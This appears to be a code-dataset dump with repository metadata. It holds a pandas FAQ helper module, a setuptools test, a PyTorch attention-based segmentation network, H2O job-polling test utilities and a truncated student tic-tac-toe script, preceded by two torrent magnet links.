# magnet:?xt=urn:btih:deade98152a7b4683204e02989b8c0aab5a05366&tr=udp://tracker.coppersurfer.tk:6969/announce&tr=udp://tracker.open-internet.nl:6969/announce&tr=udp://tracker.leechers-paradise.org:6969/announce&tr=udp://tracker.internetwarriors.net:1337/announce&tr=udp://tracker.opentrackr.org:1337/announce&tr=http://tracker.opentrackr.org:1337/announce&tr=udp://9.rarbg.to:2710/announce&tr=udp://9.rarbg.me:2710/announce&tr=udp://tracker.openbittorrent.com:80/announce&tr=udp://exodus.desync.com:6969/announce&tr=udp://tracker.torrent.eu.org:451/announce&tr=udp://tracker.tiny-vps.com:6969/announce&tr=udp://denis.stalker.upeer.me:6969/announce&tr=udp://tracker.cyberia.is:6969/announce&tr=udp://thetracker.org:80/announce&tr=udp://open.demonii.si:1337/announce&tr=udp://bt.xxx-tracker.com:2710/announce&tr=udp://explodie.org:6969/announce&tr=http://open.acgnxtracker.com:80/announce&tr=http://explodie.org:6969/announce&tr=udp://ipv4.tracker.harry.lu:80/announce&tr=udp://tracker.uw0.xyz:6969/announce&tr=http://tracker.bz:80/announce&tr=udp://tracker.moeking.me:6969/announce&tr=udp://tracker.iamhansen.xyz:2000/announce&tr=udp://tracker.filepit.to:6969/announce&tr=udp://tracker.filemail.com:6969/announce&tr=udp://torrentclub.tech:6969/announce&tr=udp://retracker.netbynet.ru:2710/announce&tr=http://vps02.net.orel.ru:80/announce&tr=http://tracker.tvunderground.org.ru:3218/announce&tr=http://torrentclub.tech:6969/announce&tr=http://t.nyaatracker.com:80/announce&tr=http://retracker.mgts.by:80/announce&tr=udp://tracker.supertracker.net:1337/announce&tr=udp://tracker.nyaa.uk:6969/announce&tr=https://tracker.fastdownload.xyz:443/announce&tr=https://t.quic.ws:443/announce&tr=http://torrent.nwps.ws:80/announce&tr=http://open.trackerlist.xyz:80/announce&tr=udp://zephir.monocul.us:6969/announce&tr=udp://tracker.trackton.ga:7070/announce&tr=udp://tracker-udp.gbitt.info:80/announce&tr=udp://retracker.sevstar.net:2710/announce&tr=udp://retracker.maxnet.ua:80/announce&tr=udp://retracker.baikal-telecom.net:2710/announce&tr=udp://retracker.akado-ural.ru:80/announce&tr=udp://pubt.in:2710/announce&tr=udp://home.penza.com.ru:6969/announce&tr=udp://carapax.net:6969/announce&tr=udp://bt.dy20188.com:80/announce&tr=https://tracker.vectahosting.eu:2053/announce&tr=https://tracker.parrotsec.org:443/announce&tr=https://tracker.gbitt.info:443/announce&tr=http://tracker.torrentyorg.pl:80/announce&tr=http://tracker.moxing.party:6969/announce&tr=http://tracker.gbitt.info:80/announce&tr=http://tracker.bt4g.com:2095/announce&tr=http://retracker.sevstar.net:2710/announce&tr=http://mail2.zelenaya.net:80/announce&tr=http://gwp2-v19.rinet.ru:80/announce&tr=http://carapax.net:6969/announce&tr=udp://tracker.msm8916.com:6969/announce&tr=udp://tracker.fixr.pro:6969/announce&tr=udp://packages.crunchbangplusplus.org:6969/announce&tr=udp://chihaya.toss.li:9696/announce&tr=https://1337.abcvg.info:443/announce&tr=http://t.acg.rip:6699/announce&tr=http://share.camoe.cn:8080/announce&tr=http://bt-tracker.gamexp.ru:2710/announce&tr=udp://tracker4.itzmx.com:2710/announce&tr=http://tracker4.itzmx.com:2710/announce&tr=http://tracker3.itzmx.com:6961/announce&tr=http://tracker2.itzmx.com:6961/announce&tr=http://tracker1.itzmx.com:8080/announce
# magnet:?xt=urn:btih:547D64DEC379E0A5511C56065C75D7FE9E860BCB&tr=udp://tracker.coppersurfer.tk:6969/announce&tr=udp://tracker.open-internet.nl:6969/announce&tr=udp://tracker.leechers-paradise.org:6969/announce&tr=udp://tracker.internetwarriors.net:1337/announce&tr=udp://tracker.opentrackr.org:1337/announce&tr=http://tracker.opentrackr.org:1337/announce&tr=udp://9.rarbg.to:2710/announce&tr=udp://9.rarbg.me:2710/announce&tr=udp://tracker.openbittorrent.com:80/announce&tr=udp://exodus.desync.com:6969/announce&tr=udp://tracker.torrent.eu.org:451/announce&tr=udp://tracker.tiny-vps.com:6969/announce&tr=udp://denis.stalker.upeer.me:6969/announce&tr=udp://tracker.cyberia.is:6969/announce&tr=udp://thetracker.org:80/announce&tr=udp://open.demonii.si:1337/announce&tr=udp://bt.xxx-tracker.com:2710/announce&tr=udp://explodie.org:6969/announce&tr=http://open.acgnxtracker.com:80/announce&tr=http://explodie.org:6969/announce&tr=udp://ipv4.tracker.harry.lu:80/announce&tr=udp://tracker.uw0.xyz:6969/announce&tr=http://tracker.bz:80/announce&tr=udp://tracker.moeking.me:6969/announce&tr=udp://tracker.iamhansen.xyz:2000/announce&tr=udp://tracker.filepit.to:6969/announce&tr=udp://tracker.filemail.com:6969/announce&tr=udp://torrentclub.tech:6969/announce&tr=udp://retracker.netbynet.ru:2710/announce&tr=http://vps02.net.orel.ru:80/announce&tr=http://tracker.tvunderground.org.ru:3218/announce&tr=http://torrentclub.tech:6969/announce&tr=http://t.nyaatracker.com:80/announce&tr=http://retracker.mgts.by:80/announce&tr=udp://tracker.supertracker.net:1337/announce&tr=udp://tracker.nyaa.uk:6969/announce&tr=https://tracker.fastdownload.xyz:443/announce&tr=https://t.quic.ws:443/announce&tr=http://torrent.nwps.ws:80/announce&tr=http://open.trackerlist.xyz:80/announce&tr=udp://zephir.monocul.us:6969/announce&tr=udp://tracker.trackton.ga:7070/announce&tr=udp://tracker-udp.gbitt.info:80/announce&tr=udp://retracker.sevstar.net:2710/announce&tr=udp://retracker.maxnet.ua:80/announce&tr=udp://retracker.baikal-telecom.net:2710/announce&tr=udp://retracker.akado-ural.ru:80/announce&tr=udp://pubt.in:2710/announce&tr=udp://home.penza.com.ru:6969/announce&tr=udp://carapax.net:6969/announce&tr=udp://bt.dy20188.com:80/announce&tr=https://tracker.vectahosting.eu:2053/announce&tr=https://tracker.parrotsec.org:443/announce&tr=https://tracker.gbitt.info:443/announce&tr=http://tracker.torrentyorg.pl:80/announce&tr=http://tracker.moxing.party:6969/announce&tr=http://tracker.gbitt.info:80/announce&tr=http://tracker.bt4g.com:2095/announce&tr=http://retracker.sevstar.net:2710/announce&tr=http://mail2.zelenaya.net:80/announce&tr=http://gwp2-v19.rinet.ru:80/announce&tr=http://carapax.net:6969/announce&tr=udp://tracker.msm8916.com:6969/announce&tr=udp://tracker.fixr.pro:6969/announce&tr=udp://packages.crunchbangplusplus.org:6969/announce&tr=udp://chihaya.toss.li:9696/announce&tr=https://1337.abcvg.info:443/announce&tr=http://t.acg.rip:6699/announce&tr=http://share.camoe.cn:8080/announce&tr=http://bt-tracker.gamexp.ru:2710/announce&tr=udp://tracker4.itzmx.com:2710/announce&tr=http://tracker4.itzmx.com:2710/announce&tr=http://tracker3.itzmx.com:6961/announce&tr=http://tracker2.itzmx.com:6961/announce&tr=http://tracker1.itzmx.com:8080/announce | [
"[email protected]"
] | |
f0c660265b92498d1ba0c1172e8fe861bbba7312 | 4649cce3d8da661ddb204428e21f714a502d36f9 | /src/ensae_teaching_cs/faq/faq_pandas.py | e7794b4e40526ab1f81f343648af19a2bd63b895 | [
"MIT"
] | permissive | xugonglei/ensae_teaching_cs | 10a7b97003e7d833dd0faaae939813bf1e134575 | f06d4ce7ea24338b5b217f6c46ff7980eac7e653 | refs/heads/master | 2020-04-30T11:10:47.368520 | 2015-10-29T21:41:23 | 2015-10-29T21:41:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,936 | py | # -*- coding: utf-8 -*-
"""
@file
@brief Quelques problèmes récurrents avec `pandas <http://pandas.pydata.org/>`_.
"""
def read_csv(filepath_or_buffer, encoding="utf8", sep="\t", **args):
"""
Calls function `read_csv <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_csv.html?highlight=read_csv#pandas.read_csv>`_
with different defaults values. If the encoding is utf8 and the data is a file name, the function
checks there is no BOM at the beginning. Otherwise, it uses the encoding ``utf-8-sig``.
@param encoding encoding
@param filepath_or_buffer filepath_or_buffer
@param sep column separator
@return DataFrame
@FAQ(pandas___Caractères bizarres en utf8 et sous Windows (BOM) ?)
.. index:: encoding, BOM, UTF8
Sous Windows, certains logiciels comme `Notepad <http://fr.wikipedia.org/wiki/Bloc-notes_%28Windows%29>`_
permettent d'enregister un fichier sous différents `encodings <http://en.wikipedia.org/wiki/Character_encoding>`_.
Avec l'encoding `UTF8 <http://fr.wikipedia.org/wiki/UTF-8>`_, on a parfois un problème avec le premier caractère
``\\ufeff`` car Notepad ajoute ce qu'on appelle un `BOM <http://fr.wikipedia.org/wiki/Indicateur_d%27ordre_des_octets>`_.
Par exemple ::
import pandas
df = pandas.read_csv("dataframe.txt",sep="\\t", encoding="utf8")
print(df)
Provoque une erreur des plus énervantes ::
UnicodeEncodeError: 'charmap' codec can't encode character '\\ufeff' in position 0: character maps to <undefined>
Pour contrecarrer ceci, il suffit de modifier l'encoding par `utf-8-sig <https://docs.python.org/3.4/library/codecs.html#encodings-and-unicode>`_ ::
import pandas
df = pandas.read_csv("dataframe.txt",sep="\\t", encoding="utf-8-sig")
print(df)
@endFAQ
"""
import pandas
if isinstance(filepath_or_buffer, str):
if encoding in ["utf8", "utf-8"]:
try:
df = pandas.read_csv(
filepath_or_buffer,
encoding=encoding,
sep=sep,
**args)
if df.columns[0].startswith("\ufeff"):
raise UnicodeError(
"'charmap' codec can't encode characters in position 0-1325: character maps to <undefined>")
return df
except UnicodeError:
df = pandas.read_csv(
filepath_or_buffer,
encoding="utf-8-sig",
sep=sep,
**args)
return df
except UnicodeDecodeError:
df = pandas.read_csv(
filepath_or_buffer,
encoding="utf-8-sig",
sep=sep,
**args)
return df
else:
return pandas.read_csv(
filepath_or_buffer, encoding=encoding, sep=sep, **args)
else:
return pandas.read_csv(
filepath_or_buffer, encoding=encoding, sep=sep, **args)
def df_to_clipboard(df, **args):
"""
Copy a dataframe as csv text into the clipboard
@param df dataframe
@param sep by default the separator is ``\\t`` for this function until it is defined otherwise
It relies on method
`to_clipboard <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.to_clipboard.html>`_.
@FAQ(pandas___Copier un dataframe dans le presse-papier - clipboard)
Pour récupérer un dataframe dans Excel, on peut utiliser la méthode
`to_excel <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.to_excel.html>`_
puis ouvrir le fichier dans Excel ou le copier dans le presse-papier et le coller
dans une feuille ouverte dans Excel. C'est l'objet de la méthode
`to_clipboard <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.to_clipboard.html>`_ ::
df = pandas.DataFrame ( ... )
df.to_clipboard(sep="\\t")
@endFAQ
"""
if "sep" in args:
df.to_clipboard(**args)
else:
df.to_clipboard(sep="\t", **args)
def df_equal(df1, df2):
"""
compares two dataframe and tells if they are equal
@param df1 first dataframe
@param df2 second dataframe
@return boolean
The function compare column one by one.
It does not check the order of the columns is the same.
It reorders the columns before doing the comparison.
If you need more complex comparison,
you can look into function `assert_frame_equal <https://github.com/pydata/pandas/blob/master/pandas/util/testing.py>`_.
The function does not handle well NaN values because ``numpy.nan != numpy.nan`` is true.
It also compares types:
@FAQ(pandas___Comment comparer deux dataframe?)
Ecrire ``df1 == df2`` ne compare pas deux dataframes entre deux
car le sens n'est pas forcément le même pour tout le monde.
Même si les valeurs sont les mêmes, est-ce l'ordre des colonnes
est important ?
Il faut donc le faire soi-même. Le code ci-dessus
compare d'abord les dimensions, ensuite compare l'ordre
des colonnes puis enfin les valeurs ::
if df1.shape != df2.shape:
return False
l1 = list(df1.columns)
l2 = list(df2.columns)
l1.sort()
l2.sort()
if l1 != l2:
return False
df1 = df1[l1]
df2 = df2[l2]
t = (df1 == df2).all()
s = set(t)
return False not in s
@endFAQ
"""
if df1.shape != df2.shape:
return False
l1 = list(df1.columns)
l2 = list(df2.columns)
l1.sort()
l2.sort()
if l1 != l2:
return False
df1 = df1[l1]
df2 = df2[l2]
s = set((df1.dtypes == df2.dtypes))
if False in s:
return False
s = set((df1 == df2).all())
return False not in s
def groupby_topn(df, by_keys, sort_keys, ascending=True, n=1, as_index=True):
"""
takes the top n rows per group
@param df dataframe
@param by_keys rows will be grouped by these columns
@param sort_keys rows will be sorted by these columns
@param ascending parameter associated to sord function
@param n n in top *n*
@param as_index if False, remove the index after the group by
@return result
@FAQ(pandas___top n lignes avec pandas)
Grouper puis garder les premières observations de ce groupe est un problème
classique. Il n'existe pas de meilleure façon de le faire,
cela dépend du nombre d'obervations par groupe. Le moyen le plus simple
de le faire avec pandas est :
* grouper les lignes
* trier les lignes dans chaque groupe
* garder les premières lignes dans chaque groupe
Ceci donne ::
df.groupby(by_keys)
.apply(lambda x: x.sort(sort_keys, ascending=ascending).head(head))
.reset_index(drop=True)
La dernière instruction supprimer l'index ce qui donne au dataframe final
la même structure que le dataframe initial.
.. runpython::
:showcode:
import pandas
l = [ dict(k1="a", k2="b", v=4, i=1),
dict(k1="a", k2="b", v=5, i=1),
dict(k1="a", k2="b", v=4, i=2),
dict(k1="b", k2="b", v=1, i=2),
dict(k1="b", k2="b", v=1, i=3)]
df = pandas.DataFrame(l)
df.groupby(["k1", "k2"]).apply(lambda x: x.sort(["v", "i"], ascending=True).head(1))
print(df)
@endFAQ
"""
res = df.groupby(by_keys).apply(lambda x: x.sort(
sort_keys, ascending=ascending).head(n))
if not as_index:
res = res.reset_index(drop=True)
return res
| [
"[email protected]"
] | |
1a7add79983d9aaaa4ac9d383db387f438a20b30 | 3abe14e934f775aca6dba588a9da5c908808daec | /setuptools/tests/test_depends.py | e0cfa88049d7ab7e93b8af06cdac45ee96c0714d | [
"MIT"
] | permissive | IronLanguages/setuptools | e1d6d6aaf990a2691f79ce3a4ca21b87e2f10a1a | 20aa9400b3d44df952c362217d3c5a1c3988467f | refs/heads/master | 2020-03-19T04:21:15.955081 | 2018-06-02T13:26:55 | 2018-06-02T13:26:55 | 135,819,098 | 2 | 1 | MIT | 2018-06-02T13:17:01 | 2018-06-02T13:17:01 | null | UTF-8 | Python | false | false | 374 | py | import sys
from setuptools import depends
class TestGetModuleConstant:
def test_basic(self):
"""
Invoke get_module_constant on a module in
the test package.
"""
mod_name = 'setuptools.tests.mod_with_constant'
val = depends.get_module_constant(mod_name, 'value')
assert val == 'three, sir!'
assert 'setuptools.tests.mod_with_constant' not in sys.modules
| [
"[email protected]"
] | |
c03e87ec7816e07b685894a92fa3274d5414db6c | e80393d0e32358d68e60b5119406c654d2373e1f | /encoding/models/aca2.py | 83cbbae9f07d7dbe332b8679537ef97e0f8d8c86 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | yougoforward/Fast_psaa | 3e333fb31743bda7684cc0bdae378bf40d839f63 | 68e99cd5bcf3bf5ab45ea604c3898fabc458c020 | refs/heads/master | 2022-11-04T02:01:03.694010 | 2019-11-30T07:53:01 | 2019-11-30T07:53:01 | 224,800,023 | 1 | 1 | NOASSERTION | 2022-10-26T23:53:43 | 2019-11-29T07:27:43 | Python | UTF-8 | Python | false | false | 7,162 | py | from __future__ import division
import torch
import torch.nn as nn
import torch.nn.functional as F
from .mask_softmax import Mask_Softmax
from .fcn import FCNHead
from .base import BaseNet
__all__ = ['ACA2Net', 'get_aca2net']
class ACA2Net(BaseNet):
def __init__(self, nclass, backbone, aux=True, se_loss=False, norm_layer=nn.BatchNorm2d, **kwargs):
super(ACA2Net, self).__init__(nclass, backbone, aux, se_loss, norm_layer=norm_layer, **kwargs)
self.head = ACA2NetHead(2048, nclass, norm_layer, se_loss, jpu=kwargs['jpu'], up_kwargs=self._up_kwargs)
if aux:
self.auxlayer = FCNHead(1024, nclass, norm_layer)
def forward(self, x):
_, _, h, w = x.size()
_, _, c3, c4 = self.base_forward(x)
x = list(self.head(c4))
x[0] = F.interpolate(x[0], (h, w), **self._up_kwargs)
if self.aux:
auxout = self.auxlayer(c3)
auxout = F.interpolate(auxout, (h, w), **self._up_kwargs)
x.append(auxout)
return tuple(x)
class ACA2NetHead(nn.Module):
def __init__(self, in_channels, out_channels, norm_layer, se_loss, jpu=False, up_kwargs=None,
atrous_rates=(12, 24, 36)):
super(ACA2NetHead, self).__init__()
self.se_loss = se_loss
inter_channels = in_channels // 4
# self.conv5c = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
# norm_layer(inter_channels),
# nn.ReLU(inplace=True))
self.sec = guided_SE_CAM_Module(in_channels, inter_channels, norm_layer)
self.conv5e = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 1, padding=0, bias=False),
norm_layer(inter_channels), nn.ReLU(True))
# self.conv5c2 = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
# norm_layer(inter_channels),
# nn.ReLU(inplace=True))
self.sec2 = guided_SE_CAM_Module(in_channels, inter_channels, norm_layer)
self.conv5e2 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 1, padding=0, bias=False),
norm_layer(inter_channels), nn.ReLU(True))
self.conv8 = nn.Sequential(nn.Dropout2d(0.1), nn.Conv2d(512, out_channels, 1))
self.gap = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Conv2d(inter_channels, inter_channels, 1),
nn.Sigmoid())
if self.se_loss:
self.selayer = nn.Linear(inter_channels, out_channels)
def forward(self, x):
# sec
# feat = self.conv5c(x)
sec_feat = self.sec(x)
sec_feat = self.conv5e(sec_feat)
# feat2 = self.conv5c2(x)
sec_feat2 = self.sec2(x)
sec_feat2 = self.conv5e2(sec_feat2)
feat_sum = sec_feat + sec_feat2
if self.se_loss:
gap_feat = self.gap(feat_sum)
gamma = self.fc(gap_feat)
outputs = [self.conv8(F.relu_(feat_sum + feat_sum * gamma))]
outputs.append(self.selayer(torch.squeeze(gap_feat)))
else:
outputs = [self.conv8(feat_sum)]
return tuple(outputs)
def get_aca2net(dataset='pascal_voc', backbone='resnet50', pretrained=False,
root='~/.encoding/models', **kwargs):
# infer number of classes
from ..datasets import datasets
model = ACA2Net(datasets[dataset.lower()].NUM_CLASS, backbone=backbone, root=root, **kwargs)
if pretrained:
raise NotImplementedError
return model
class guided_CAM_Module(nn.Module):
""" Position attention module"""
# Ref from SAGAN
def __init__(self, in_dim, out_dim):
super(guided_CAM_Module, self).__init__()
self.chanel_in = in_dim
self.chanel_out = out_dim
self.query_conv = nn.Sequential(
nn.Conv2d(in_channels=in_dim, out_channels=out_dim, kernel_size=1, bias=False), nn.BatchNorm2d(out_dim),
nn.ReLU())
self.key_conv = nn.Sequential(
nn.Conv2d(in_channels=in_dim, out_channels=out_dim, kernel_size=1, bias=False), nn.BatchNorm2d(out_dim),
nn.ReLU())
self.value_conv = nn.Sequential(
nn.Conv2d(in_channels=in_dim, out_channels=out_dim, kernel_size=1, bias=False), nn.BatchNorm2d(out_dim),
nn.ReLU())
self.gamma = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=-1)
def forward(self,x):
"""
inputs :
x : input feature maps( B X C X H X W)
returns :
out : attention value + input feature
attention: B X C X C
"""
m_batchsize, C, height, width = x.size()
proj_query = self.query_conv(x).view(m_batchsize, self.chanel_out, -1)
proj_key = self.key_conv(x).view(m_batchsize, self.chanel_out, -1).permute(0, 2, 1)
energy = torch.bmm(proj_query, proj_key)
energy_new = torch.max(energy, -1, keepdim=True)[0].expand_as(energy)-energy
attention = self.softmax(energy_new)
proj_value = self.value_conv(x)
out = torch.bmm(attention, proj_value.view(m_batchsize, self.chanel_out, -1))
out = out.view(m_batchsize, self.chanel_out, height, width)
out = self.gamma*out + proj_value
return out
class SE_Module(nn.Module):
""" Channel attention module"""
def __init__(self, in_dim, out_dim):
super(SE_Module, self).__init__()
self.se = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)),
nn.Conv2d(in_dim, in_dim // 16, kernel_size=1, padding=0, dilation=1,
bias=True),
nn.ReLU(),
nn.Conv2d(in_dim // 16, out_dim, kernel_size=1, padding=0, dilation=1,
bias=True),
nn.Sigmoid()
)
def forward(self, x):
out = self.se(x)
return out
class guided_SE_CAM_Module(nn.Module):
""" Channel attention module"""
def __init__(self, in_dim, out_dim, norm_layer):
super(guided_SE_CAM_Module, self).__init__()
self.guided_cam = guided_CAM_Module(in_dim, out_dim)
self.project = nn.Sequential(
nn.Conv2d(in_dim, out_dim, kernel_size=1, padding=0, dilation=1, bias=False),
norm_layer(out_dim), nn.ReLU(True),
)
self.se = SE_Module(in_dim, out_dim)
self.relu = nn.ReLU()
def forward(self, x):
"""
inputs :
x : input feature maps( B X C X H X W)
returns :
out : attention value + input feature
attention: B X C X C
"""
gcam = self.guided_cam(x)
bottle = self.project(x)
se_x = self.se(x)
se_bottle = se_x * bottle + bottle
# out = torch.cat([gcam, se_bottle], dim=1)
out = self.relu(se_bottle+gcam)
return out
| [
"[email protected]"
] | |
74181cfa74ae35c7c13033e73dd6978c8ffce412 | 07f837d8c5236fe5e75ef510cd296814452370ce | /py/h2o_jobs.py | 311baeb46561a756eefb1ed044efe40f6157e30d | [
"Apache-2.0"
] | permissive | vkuznet/h2o | 6f9006a5186b964bac266981d9082aec7bc1067c | e08f7014f228cbaecfb21f57379970e6a3ac0756 | refs/heads/master | 2021-08-28T11:37:52.099953 | 2021-08-10T22:43:34 | 2021-08-10T22:43:34 | 20,032,996 | 0 | 0 | Apache-2.0 | 2021-08-10T22:43:35 | 2014-05-21T18:46:27 | Java | UTF-8 | Python | false | false | 9,555 | py | import time, sys
import h2o, h2o_browse as h2b
def pollStatsWhileBusy(timeoutSecs=300, pollTimeoutSecs=15, retryDelaySecs=5):
busy = True
trials = 0
start = time.time()
polls = 0
statSum = {}
# just init for worst case 64 nodes?
lastUsedMemBytes = [1 for i in range(64)]
while busy:
polls += 1
# get utilization and print it
# any busy jobs
a = h2o.nodes[0].jobs_admin(timeoutSecs=60)
busy = False
for j in a['jobs']:
if j['end_time']=='' and not (j['cancelled'] or (j['result'].get('val', None)=='CANCELLED')):
busy = True
h2o.verboseprint("Still busy")
break
cloudStatus = h2o.nodes[0].get_cloud(timeoutSecs=timeoutSecs)
nodes = cloudStatus['nodes']
for i,n in enumerate(nodes):
# check for drop in tot_mem_bytes, and report as "probably post GC"
totMemBytes = n['tot_mem_bytes']
maxMemBytes = n['max_mem_bytes']
freeMemBytes = n['free_mem_bytes']
usedMemBytes = totMemBytes - freeMemBytes
availMemBytes = maxMemBytes - usedMemBytes
print 'Node %s:' % i, \
'num_cpus:', n['num_cpus'],\
'my_cpu_%:', n['my_cpu_%'],\
'sys_cpu_%:', n['sys_cpu_%'],\
'system_load:', n['system_load'],\
'tot_mem_bytes: {:,}'.format(totMemBytes),\
'max_mem_bytes: {:,}'.format(maxMemBytes),\
'free_mem_bytes: {:,}'.format(freeMemBytes),\
'usedMemBytes: {:,}'.format(usedMemBytes)
decrease = round((0.0 + lastUsedMemBytes[i] - usedMemBytes) / lastUsedMemBytes[i], 3)
if decrease > .05:
print
print "\nProbably GC at Node {:}: usedMemBytes decreased by {:f} pct.. {:,} {:,}".format(i, 100 * decrease, lastUsedMemBytes[i], usedMemBytes)
lastUsedMemBytes[i] = usedMemBytes
# don't update lastUsedMemBytes if we're decreasing
if usedMemBytes > lastUsedMemBytes[i]:
lastUsedMemBytes[i] = usedMemBytes
# sum all individual stats
for stat in n:
if stat in statSum:
try:
statSum[stat] += n[stat]
except TypeError:
# raise Exception("statSum[stat] should be number %s %s" % (statSum[stat], stat, n[stat]))
print "ERROR: statSum[stat] should be number %s %s %s" % (statSum[stat], stat, n[stat])
# do nothing
else:
try:
statSum[stat] = n[stat] + 0.0
except TypeError:
pass # ignore non-numbers
trials += 1
if trials%5 == 0:
h2o.check_sandbox_for_errors()
time.sleep(retryDelaySecs)
if ((time.time() - start) > timeoutSecs):
raise Exception("Timeout while polling in pollStatsWhileBusy: %s seconds" % timeoutSecs)
# now print man
print "Did %s polls" % polls
statMean = {}
print "Values are summed across all nodes (cloud members), so divide by node count"
for s in statSum:
statMean[s] = round((statSum[s] + 0.0) / polls, 2)
print "per poll mean", s + ':', statMean[s]
return statMean
# statMean['tot_mem_bytes'],
# statMean['num_cpus'],
# statMean['my_cpu_%'],
# statMean['sys_cpu_%'],
# statMean['system_load']
# poll the Jobs queue and wait if not all done.
# Return matching keys to a pattern for 'destination_key"
# for a job (model usually)
# FIX! the pattern doesn't limit the jobs you wait for (sounds like it does)
# I suppose it's rare that we'd want to wait for a subset of jobs, but lets
# 'key' 'description' 'destination_key' could all be interesting things you want to pattern match agains?
# what the heck, just look for a match in any of the 3 (no regex)
# if pattern is not None, only stall on jobs that match the pattern (in any of those 3)
def pollWaitJobs(pattern=None, errorIfCancelled=False, timeoutSecs=60, pollTimeoutSecs=60, retryDelaySecs=5, benchmarkLogging=None, stallForNJobs=None):
wait = True
waitTime = 0
ignoredJobs = set()
while (wait):
a = h2o.nodes[0].jobs_admin(timeoutSecs=pollTimeoutSecs)
h2o.verboseprint("jobs_admin():", h2o.dump_json(a))
jobs = a['jobs']
busy = 0
for j in jobs:
cancelled = j['cancelled'] or (j['result'].get('val', None)=='CANCELLED')
description = j['description']
destination_key = j['destination_key']
end_time = j['end_time']
key = j['key']
progress = j['progress']
# has exception and val?
result = j['result']
start_time = j['start_time']
# for now, don't ignore any exceptions
if 'exception' in result and result['exception']:
h2o.check_sandbox_for_errors()
msg = "ERROR: pollWaitJobs found a job with a exception result when it shouldn't have:\n %s" % h2o.dump_json(j)
raise Exception(msg)
if result:
# ignore if 'val' is 'OK'
if 'val' in result and result['val'] == 'OK':
pass
else:
print "non-empty result: %s for %s" % (result, key)
if errorIfCancelled and cancelled:
h2o.check_sandbox_for_errors()
print ("ERROR: not stopping, but: pollWaitJobs found a cancelled job when it shouldn't have:\n %s" % h2o.dump_json(j))
print ("Continuing so maybe a json response will give more info")
### h2o.verboseprint(j)
# don't include cancelled jobs here
elif end_time=='' and not cancelled:
if not pattern:
# always print progress if busy job (no pattern used
print "time:", time.strftime("%I:%M:%S"), "progress:", progress, destination_key
h2o.verboseprint("description:", description, "end_time:", end_time)
busy +=1
h2o.verboseprint("pollWaitJobs: found a busy job, now: %s" % busy)
else:
if (pattern in key) or (pattern in destination_key) or (pattern in description):
## print "description:", description, "end_time:", end_time
busy += 1
h2o.verboseprint("pollWaitJobs: found a pattern-matched busy job, now %s" % busy)
# always print progress if pattern is used and matches
print "time:", time.strftime("%I:%M:%S"), "progress:", progress, destination_key
# we only want to print the warning message once
elif key not in ignoredJobs:
jobMsg = "%s %s %s" % (key, description, destination_key)
h2o.verboseprint(" %s job in progress but we're ignoring it. Doesn't match pattern." % jobMsg)
# I guess "key" is supposed to be unique over all time for a job id?
ignoredJobs.add(key)
if stallForNJobs:
waitFor = stallForNJobs
else:
waitFor = 0
print " %s jobs in progress." % busy, "Waiting until %s in progress." % waitFor
wait = busy > waitFor
if not wait:
break
### h2b.browseJsonHistoryAsUrlLastMatch("Jobs")
if (wait and waitTime > timeoutSecs):
print h2o.dump_json(jobs)
raise Exception("Some queued jobs haven't completed after", timeoutSecs, "seconds")
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(retryDelaySecs)
waitTime += retryDelaySecs
# any time we're sitting around polling we might want to save logging info (cpu/disk/jstack)
# test would pass ['cpu','disk','jstack'] kind of list
if benchmarkLogging:
h2o.cloudPerfH2O.get_log_save(benchmarkLogging)
# check the sandbox for stack traces! just like we do when polling normally
h2o.check_sandbox_for_errors()
patternKeys = []
for j in jobs:
# save the destination keys in progress that match pattern (for returning)
if pattern and pattern in j['destination_key']:
patternKeys.append(j['destination_key'])
return patternKeys
def showAllJobs():
print "Showing all jobs"
a = h2o.nodes[0].jobs_admin(timeoutSecs=10)
print h2o.dump_json(a)
#*******************************************************************************************
def cancelAllJobs(timeoutSecs=10, **kwargs): # I guess you could pass pattern
# what if jobs had just been dispatched? wait until they get in the queue state correctly
time.sleep(2)
a = h2o.nodes[0].jobs_admin(timeoutSecs=120)
print "jobs_admin():", h2o.dump_json(a)
jobsList = a['jobs']
for j in jobsList:
if j['end_time'] == '':
b = h2o.nodes[0].jobs_cancel(key=j['key'])
print "jobs_cancel():", h2o.dump_json(b)
# it's possible we could be in a bad state where jobs don't cancel cleanly
pollWaitJobs(timeoutSecs=timeoutSecs, **kwargs) # wait for all the cancels to happen. If we missed one, we might timeout here.
| [
"[email protected]"
] | |
3c145b8ef4e538afdc8b05b7dc35000c6cd14bde | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/429/usersdata/321/107581/submittedfiles/jogoDaVelha.py | b5f5699b08831f08b81685112bfe8cf9f27f5873 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | # -*- coding: utf-8 -*-
from jogoDaVelha_BIB import *
# COLOQUE SEU PROGRAMA A PARTIR DAQUI
print('Bem vindo ao JogoDaVelha do grupo 8 [Iara, Ingrid, Luiz Otávio, Tatiane]\n')
a=nome()
b=solicitaSimboloDoHumano()
sort=sorteioPrimeiraJogada(a)
if sort==0:
if b == 'X':
c = ' O '
else:
c = ' X '
JogadaComputador(c)
mostrarTabuleiro()
p=JogadaHumana(a,b)
else:
if b == 'X':
c = ' O '
else:
c = ' X '
p=JogadaHumana(a,b)
JogadaComputador(c)
mostrarTabuleiro()
while not verificaVencedor(b,tabuleiro,a):
if sort==0:
if JogadaComputador(c):
mostrarTabuleiro()
JogadaHumana(a,b)
mostrarTabuleiro()
else:
if JogadaHumana(a,b):
if JogadaComputador(c):
mostrarTabuleiro()
